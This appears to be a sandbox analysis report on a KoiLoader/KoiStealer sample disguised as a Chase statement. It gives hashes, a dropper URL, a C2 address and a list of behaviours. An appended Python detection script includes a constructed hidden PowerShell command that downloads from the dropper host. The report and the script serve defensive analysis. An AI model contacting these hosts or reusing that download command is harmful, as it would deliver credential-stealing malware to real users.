General

  • Target

    chase_apr_2025.zip

  • Size

    878B

  • Sample

    250501-zd5b9sfp5s

  • MD5

    a2ff988165e14b0b9f57918c810cbcb2

  • SHA1

    c7f80cf66c9ecca0278d41f6724face262225e9e

  • SHA256

    c6a75ac0fee7c4be487eff214bba103b0b8f109c64c6ad818b1f1140f00ba9af

  • SHA512

    6e8f0a6482301912cc40d08a975d747fbcbb46d3fe75fd2979bec41194b4632d6d190ee88acc3ef875d7a843ae1ff64b408c10220b1e206139c42b33f1b4e6c9

Malware Config

Extracted (Source)

  • Language

    ps1

  • URLs (exe.dropper)

    https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php

Extracted (Deobfuscated)

  • Language

    ps1

  • URLs (exe.dropper)

    https://maconsmallbusinesses.com/wp-content/uploads/2018/08

Extracted

  • Family

    koiloader

  • C2

    http://82.118.16.176/punctulum.php

  • Attributes

    payload_url: https://maconsmallbusinesses.com/wp-content/uploads/2018/08

Targets

    • Target

      chase_apr_2025.lnk

    • Size

      1KB

    • MD5

      8801711cde4f2ceb0d7fbce61920a543

    • SHA1

      8042a5de003d7adcfde86a25e3c085edfa9d48dc

    • SHA256

      2a1844690be2dcbaa2b3975e529ff5e8a18a5620e4ee7429f2040f8fc4a6c76e

    • SHA512

      9c3743814519353200248c370dd3e60c61db9869aa40b22d662cbf55ab066300eee0a9ca422d784bdb9fa1522f55e4eb9c959f4b4c46098c2b5355e8fb028b56

    • KoiLoader

      KoiLoader is a malware loader written in C++.

    • KoiStealer

      KoiStealer is an infostealer written in C#.

    • Koiloader family

    • Koistealer family

    • Detects KoiLoader payload

    • Detects KoiStealer payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely for geofencing.

    • Indicator Removal: Clear Persistence

      Clears artifacts associated with previously established persistence, such as scheduled tasks, on the host.
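The behaviours listed above (PowerShell download, a blocklisted process making a network request, the registry country-code lookup, scheduled-task cleanup) and the indicators in the config section can be turned into a small detection pass. The block below is an added example, not part of the sandbox report or the sample itself: the hashes, URLs and C2 are copied from this page, but the event lines are constructed in the shape of Sysmon-style process, network and registry telemetry and were not captured from the run. The blocklist of network-capable interpreters and the `Control Panel\International\Geo\Nation` key used for the location check are assumptions about what the report's signatures matched, not facts stated by the report.

```python
"""Detection pass over constructed telemetry for the chase_apr_2025 chain.

Added example; not the sandbox's own signature code. Indicators are taken
from the report, the events below are constructed for illustration.
"""
from __future__ import annotations

import hashlib
import re

# Indicators copied from the report (zip and lnk hashes, dropper host, C2 host).
IOC_HASHES = {
    "md5": {"a2ff988165e14b0b9f57918c810cbcb2",      # chase_apr_2025.zip
            "8801711cde4f2ceb0d7fbce61920a543"},     # chase_apr_2025.lnk
    "sha256": {"c6a75ac0fee7c4be487eff214bba103b0b8f109c64c6ad818b1f1140f00ba9af",
               "2a1844690be2dcbaa2b3975e529ff5e8a18a5620e4ee7429f2040f8fc4a6c76e"},
}
IOC_HOSTS = {"maconsmallbusinesses.com", "82.118.16.176"}

# Assumption: interpreters a sandbox would treat as "blocklisted" for network activity.
BLOCKLISTED_NET = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe")
PS_DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
# Assumption: the country-code lookup reads the GeoID stored under this key.
GEO_KEY_SUFFIX = r"\geo\nation"

# Constructed events (not from the sandbox run), roughly Sysmon event fields.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr '
                'https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php"'},
    {"type": "network",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest": "maconsmallbusinesses.com", "port": 443},
    {"type": "network", "image": r"C:\Users\Public\payload.exe",
     "dest": "82.118.16.176", "port": 80, "url": "http://82.118.16.176/punctulum.php"},
    {"type": "registry", "image": r"C:\Users\Public\payload.exe",
     "key": r"HKCU\Control Panel\International\Geo\Nation", "op": "read"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /Delete /TN Updater /F"},
]


def score_event(ev: dict) -> list[str]:
    """Return the report signature names that one event satisfies."""
    hits: list[str] = []
    image = ev.get("image", "").lower()
    if ev["type"] == "process":
        cmd = ev.get("cmdline", "")
        if image.endswith("powershell.exe") and PS_DOWNLOAD_RE.search(cmd):
            hits.append("Command and Scripting Interpreter: PowerShell")
        if image.endswith("schtasks.exe") and re.search(r"/delete\b", cmd, re.I):
            hits.append("Indicator Removal: Clear Persistence")
    elif ev["type"] == "network":
        if any(image.endswith(p) for p in BLOCKLISTED_NET):
            hits.append("Blocklisted process makes network request")
        if ev.get("dest", "").lower() in IOC_HOSTS:
            hits.append("Known KoiLoader infrastructure")
    elif ev["type"] == "registry":
        if ev.get("key", "").lower().endswith(GEO_KEY_SUFFIX):
            hits.append("Checks computer location settings")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run score_event over a list of events; returns (event index, signature) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in score_event(ev)]


def matches_report_hash(data: bytes) -> set[str]:
    """Hash algorithms whose digest of `data` appears in the report's indicator set."""
    return {alg for alg, known in IOC_HASHES.items()
            if getattr(hashlib, alg)(data).hexdigest() in known}


if __name__ == "__main__":
    for idx, sig in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {sig}")
```

The host match is deliberately separate from the blocklist check: the PowerShell stage hits both (interpreter plus dropper host), while the later C2 beacon from the dropped executable is caught only by the indicator list, which is the case that matters once the loader has moved past the interpreter stage.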

MITRE ATT&CK Enterprise v16

Tasks